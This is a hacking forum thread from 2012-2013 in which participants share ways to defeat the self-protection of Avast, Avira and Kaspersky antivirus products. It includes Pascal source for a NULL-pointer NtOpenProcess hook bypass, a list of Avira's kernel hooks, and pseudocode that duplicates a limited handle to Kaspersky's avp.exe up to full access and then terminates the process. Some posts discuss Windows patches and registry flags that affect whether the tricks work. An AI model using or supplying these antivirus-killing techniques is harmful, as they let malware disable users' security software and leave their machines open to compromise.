AV SP Discussion & Bypass

Forum for discussion about user-mode development.
User avatar
R00tKit
Posts: 129
Joined: Tue Nov 16, 2010 8:23 pm
Contact:

Re: AV SP Discussion & Bypass

Post by R00tKit » Thu Nov 29, 2012 8:29 am

send pm to 0x16/7ton
@R00tkitSMM

User avatar
0x16/7ton
Posts: 50
Joined: Fri Apr 20, 2012 12:59 pm
Location: Russian Federation
Contact:

Re: AV SP Discussion & Bypass

Post by 0x16/7ton » Thu Jan 03, 2013 8:07 pm

I want share about some interesting bypassing SP method in avast and avira ,for x86 arch model.
In both antivirus SP based on hooking in SSDT NtOpenProcess function,to prevent terminating protecting process.
For example avast just return STATUS_ACCESS_DENIED,or avira changing access mask for opening process handle (read/query only) when we try open protected process
In hook handler function on start they all check input parameteres for NtOpenProcess function.
Here defination of it :

Code: Select all

NTSTATUS NtOpenProcess
(
  _Out_     PHANDLE ProcessHandle,
  _In_      ACCESS_MASK DesiredAccess,
  _In_      POBJECT_ATTRIBUTES ObjectAttributes,
  _In_opt_  PCLIENT_ID ClientId
)
So i am use some trick to fool AV:
ProcessHandle and ObjectAttributes can be a NULL pointer ;) Yes i mean that windows allowed that parameters with NULL and not failed if we allocate memory with READ/WRITE access in NULL region.
In result AV checking not execute(they think incoming parameters not correct),and only passing control flow to original function.
Ok here demo video :
http://www.sendspace.com/file/bibrzz
Have Fuuun and also my regards ;)
Cause and effect

User avatar
EP_X0FF
Global Moderator
Posts: 4883
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation
Contact:

Re: AV SP Discussion & Bypass

Post by EP_X0FF » Fri Jan 04, 2013 10:56 am

Old good trick with null pointer. Did not think that this is still going to work on someone. Won't work in Win8.

If anyone interested, here is old pascal source. Only avira detect+kill code missing.

Code: Select all

var
  Status: NTSTATUS;
  addr: pointer;
  size: ULONG;
  cid: CLIENT_ID;
  attr: OBJECT_ATTRIBUTES;
begin
  addr := pointer($1);
  size := $1000;

  Status := ZwAllocateVirtualMemory(NtCurrentProcess, @addr, 0, @size, MEM_RESERVE or MEM_COMMIT, PAGE_READWRITE);
  if (Status = STATUS_SUCCESS) then
  begin

    InitializeObjectAttributes(@attr, nil, 0, 0);
    cid.UniqueProcess := GetCurrentProcessId();

    Status := ZwOpenProcess(nil, PROCESS_ALL_ACCESS, nil, @cid);
    if (Status = STATUS_SUCCESS) then
    begin
      ZwClose(PHANDLE(nil)^);
      MessageBoxW(0, 'Success', '', MB_OK);
    end;
    ZwFreeVirtualMemory(NtCurrentProcess, @addr, @size, MEM_RELEASE);
  end else
    MessageBoxW(0, 'ZWAVM fail', '', MB_OK);
List of Avira 13 hooks.
NtClose
NtCreateKey
NtCreateSection
NtCreateThread,
NtDeleteKey
NtDeleteValueKey
NtDuplicateObject
NtLoadKey
NtOpenProcess
NtOpenThread
NtQueryValueKey
NtReplaceKey
NtRequestWaitReplyPort
NtRestoreKey
NtSetContextThread
NtSetSecurityObject
NtSetValueKey
NtSystemDebugControl
NtTerminateProcess
Pretty banal, multiple ways to terminate using valid full access process handle.
Ring0 - the source of inspiration

rinn
Posts: 91
Joined: Thu Nov 15, 2012 6:14 am
Location: Japan

Re: AV SP Discussion & Bypass

Post by rinn » Wed Apr 10, 2013 3:11 am

Hello.

Bumping the old thread to add: trick with using NULL VA allocated memory should not be working after MS13-031 :)

Best Regards,
-rin

User avatar
EP_X0FF
Global Moderator
Posts: 4883
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation
Contact:

Re: AV SP Discussion & Bypass

Post by EP_X0FF » Wed Apr 10, 2013 6:30 am

rinn wrote:Bumping the old thread to add: trick with using NULL VA allocated memory should not be working after MS13-031 :)
It still will be working in XP, as no one interested/motivated in XP redesign.
Ring0 - the source of inspiration

rinn
Posts: 91
Joined: Thu Nov 15, 2012 6:14 am
Location: Japan

Re: AV SP Discussion & Bypass

Post by rinn » Wed Apr 10, 2013 7:13 am

EP_X0FF wrote:
rinn wrote:Bumping the old thread to add: trick with using NULL VA allocated memory should not be working after MS13-031 :)
It still will be working in XP, as no one interested/motivated in XP redesign.
Hi.

Yes, true for 32 bit versions of Windows, because of NTVDM.

Best Regards,
-rin

User avatar
0x16/7ton
Posts: 50
Joined: Fri Apr 20, 2012 12:59 pm
Location: Russian Federation
Contact:

Re: AV SP Discussion & Bypass

Post by 0x16/7ton » Wed Apr 10, 2013 9:26 am

Yeap patch :)
this man @Ivanlef0u (in twitter) found this:
on Windows7 x86 still can be mapped NULL page because gloval var nt!MmLowVaMapping is 1
also we can control this global parameter:
HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management
EnableLowVaAccess
And this:
Image File Execution Options [EnableLowVaAccess]
Hehe and in the end it is not a problem using another well known method..for example transfer function parameters with set PAGE_GUARD memory attribute
Cause and effect

User avatar
EP_X0FF
Global Moderator
Posts: 4883
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation
Contact:

Re: AV SP Discussion & Bypass

Post by EP_X0FF » Wed Apr 10, 2013 9:53 am

0x16/7ton wrote: HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management
EnableLowVaAccess
And this:
Image File Execution Options [EnableLowVaAccess]
Without admin rights you cannot change it.
Hehe and in the end it is not a problem using another well known method..for example transfer function parameters with set PAGE_GUARD memory attribute
Does it still works with something? I know Comodo was vulnerable to this.
Ring0 - the source of inspiration

User avatar
0x16/7ton
Posts: 50
Joined: Fri Apr 20, 2012 12:59 pm
Location: Russian Federation
Contact:

Re: AV SP Discussion & Bypass

Post by 0x16/7ton » Wed Apr 10, 2013 10:03 am

I am not try on other vendor,but i think some of them will be fooled.
Anyway on x64 system HIPS it is totally weird shit and for us not needed to use any tricks :D
Cause and effect

User avatar
0x16/7ton
Posts: 50
Joined: Fri Apr 20, 2012 12:59 pm
Location: Russian Federation
Contact:

Re: AV SP Discussion & Bypass

Post by 0x16/7ton » Sat May 11, 2013 12:01 pm

pikA kernelMode :)
Today i am gonna show another simple trick to fool AV.
Ok victim == kaspersky 2013 with all last update (yeap really,i have licensed version :D)

So as we already discussed,SP of all AV Is based on the prohibition of opening protected process.
But of course to provide some compatibility they allowed opening theirs process with some limited access.
Ok example:
kaspersky allowed to open his main (avp.exe) process with PROCESS_QUERY_LIMITED_INFORMATION access mask.
And here simple trick:
we use ZwDuplicateObject function to duplicate handle of opened process,but with other ACCESS_MASK (DesiredAccess)

Code: Select all

NTSTATUS ZwDuplicateObject(
  _In_       HANDLE SourceProcessHandle,
  _In_       HANDLE SourceHandle,
  _In_opt_   HANDLE TargetProcessHandle,
  _Out_opt_  PHANDLE TargetHandle,
  _In_       ACCESS_MASK DesiredAccess,
  _In_       ULONG HandleAttributes,
  _In_       ULONG Options
);
Simple pseudo code:

Code: Select all

//opening avp.exe
hProcess=OpenProcess( PROCESS_QUERY_LIMITED_INFORMATION);
//duplicate new handle with full access
ZwDuplicateObject((HANDLE)CURRENT_PROCESS,hProcess,(HANDLE)CURRENT_PROCESS,&new_handle,PROCESS_ALL_ACCESS,DUPLICATE_SAME_ATTRIBUTES);
In result we have full access process handle..So what we can do?For example i am using this well known method to force the process to be terminating:

Code: Select all

for (i = 0 ; i <= 4096 ; i++)
{
     HANDLE copy_handle;
     DuplicateHandle( new_handle, (HANDLE)i , NULL, &copy_handle, 0, FALSE, DUPLICATE_CLOSE_SOURCE)
}
I am can't test now with other av and on other Windows versions(i am testing on VistaSP1 x86)
Also i am did not make video demo,but i am attach test sample,so if you want try it -you are welcome:)
notes:
-in attached sample terminating only GUI process avp.exe
-to terminate service i am think we need admin rigths and impersonating thread with system SID token(S-1-5-18),otherwise ZwDuplicateObject return STATUS_ACCESS_DENIED
You do not have the required permissions to view the files attached to this post.
Cause and effect

Post Reply